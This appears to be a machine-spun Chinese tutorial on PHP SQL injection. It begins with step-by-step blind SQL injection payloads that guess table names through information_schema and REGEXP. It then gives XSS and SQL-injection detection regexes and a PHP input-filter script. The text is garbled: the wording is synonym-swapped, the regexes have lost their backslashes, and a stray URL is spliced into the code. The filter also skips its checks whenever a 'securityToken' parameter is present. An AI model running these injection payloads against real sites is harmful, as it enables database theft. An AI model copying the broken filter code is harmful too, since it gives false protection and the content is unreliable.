這篇文章主要先容了php中常見(jiàn)的sql進(jìn)攻正則表達(dá)式,實(shí)例匯總了針對(duì)各類(lèi)常見(jiàn)的SQL語(yǔ)句及正則表達(dá)式道理的闡明與應(yīng)用,對(duì)付PHP措施設(shè)計(jì)的安詳來(lái)說(shuō)具有很好的參考警惕代價(jià),需要的伴侶可以參考下
本文實(shí)例報(bào)告了php中常見(jiàn)的sql進(jìn)攻正則表達(dá)式。分享給各人供各人參考。詳細(xì)闡明如下:
我們都已經(jīng)知道,,在MYSQL 5+中 information_schema庫(kù)中存儲(chǔ)了所有的 庫(kù)名,表白以及字段名信息。故進(jìn)攻方法如下:
1. 判定第一個(gè)表名的第一個(gè)字符是否是a-z中的字符,個(gè)中blind_sqli是假設(shè)已知的庫(kù)名。
注:正則表達(dá)式中 ^[a-z] 暗示字符串中開(kāi)始字符是在 a-z范疇內(nèi)
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*
2. 判定第一個(gè)字符是否是a-n中的字符
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3. 確定該字符為n
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*
4. 表達(dá)式的改換如下
expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE
這時(shí)說(shuō)明表名為news ,要驗(yàn)證是否是該表白 正則表達(dá)式為'^news$',可是沒(méi)這須要 直接判定 table_name = 'news‘ 不就行了。
5.接下來(lái)猜解其它表了 只需要修改 limit 1,1 -> limit 2,1就可以對(duì)接下來(lái)的表舉辦盲注了。
譬喻:
$Exec_Commond = "(
s|S)*(exec(s|+)+(s|x)pw+)(s|S)*";
$Simple_XSS = "(
s|S)*((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)(s|S)*";
$Eval_XSS = "(
s|S)*((%65)|e)(s)*((%76)|v)(s)*((%61)|a)(s)*((%6C)|l)(s|S)*";
$Image_XSS = "(
s|S)*((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))((%67)|g|G|(%47))[^n]+((%3E)|>)(s|S)*"
;
$Script_XSS = "(
s|S)*((%73)|s)(s)*((%63)|c)(s)*((%72)|r)(s)*((%69)|i)(s)*((%70)|p)(s)*((%74)|t)(s|S)*";
$SQL_Injection = "(
s|S)*((%27)|(')|(%3D)|(=)|(/)|(%2F)|(")|((%22)|(-|%2D){2})|(%23)|(%3B)|(;))+(s|S)*";
sql進(jìn)攻代碼:
<?php
function customError($errno, $errstr, $errfile, $errline)
{
echo "<b>Error number:</b>
[$errno],error on line $errline in $errfile<br />";
die();
}
http://www.server110.com/
set_error_handler("customError",E_ERROR);
$getfilter="'|(and|or)b.+?(>|<|=|in|like)|/*.+?*/|<s*scriptb|bEXECb|UNION.+?SELECT|UPDATE.+?SET|INSERTs+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)s+(TABLE|DATABASE)";
$postfilter="b(and|or)b.{1,6}?(=|>|<|binb|blikeb)|/*.+?*/|<s*scriptb|bEXECb|UNION.+?SELECT|UPDATE.+?SET|INSERTs+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)s+(TABLE|DATABASE)";
$cookiefilter="b(and|or)b.{1,6}?(=|>|<|binb|blikeb)|/*.+?*/|<s*scriptb|bEXECb|UNION.+?SELECT|UPDATE.+?SET|INSERTs+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)s+(TABLE|DATABASE)";
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq)
{
if(is_array($StrFiltValue))
{
$StrFiltValue=implode($StrFiltValue);
}
if
(preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1&&!isset($_REQUEST['securityToken']))
{
slog("<br><br>操縱IP:
".$_SERVER["REMOTE_ADDR"]."<br>操縱時(shí)間: ".strftime("%Y-%m-%d
%H:%M:%S")."<br>操縱頁(yè)面:".$_SERVER["PHP_SELF"]."<br>提交方法:
".$_SERVER["REQUEST_METHOD"]."<br>提交參數(shù):
".$StrFiltKey."<br>提交數(shù)據(jù): ".$StrFiltValue);
print "result
notice:Illegal operation!";
exit();
}
}
foreach($_GET as $key=>$value)
{
StopAttack($key,$value,$getfilter);
}
foreach($_POST as $key=>$value)
{
StopAttack($key,$value,$postfilter);
}
foreach($_COOKIE as $key=>$value)
{
StopAttack($key,$value,$cookiefilter);
}
function slog($logs)
{
$toppath="log.htm";
$Ts=fopen($toppath,"a+");
fputs($Ts,$logs."rn");
fclose($Ts);
}
?>
sql闡明:
假如利用這個(gè)函數(shù)的話,這個(gè)函數(shù)會(huì)繞開(kāi)PHP的尺度墮落處理懲罰,所以說(shuō)得本身界說(shuō)報(bào)錯(cuò)處理懲罰措施(die())。
其次,假如代碼執(zhí)行前就產(chǎn)生了錯(cuò)誤,誰(shuí)人時(shí)候用戶自界說(shuō)的措施還沒(méi)有執(zhí)行,所以就不會(huì)用到用戶本身寫(xiě)的報(bào)錯(cuò)處理懲罰措施。
那么,PHP里有一套錯(cuò)誤處理懲罰機(jī)制,可以利用set_error_handler()經(jīng)受PHP錯(cuò)誤處理懲罰,也可以利用trigger_error()函數(shù)主動(dòng)拋出一個(gè)錯(cuò)誤。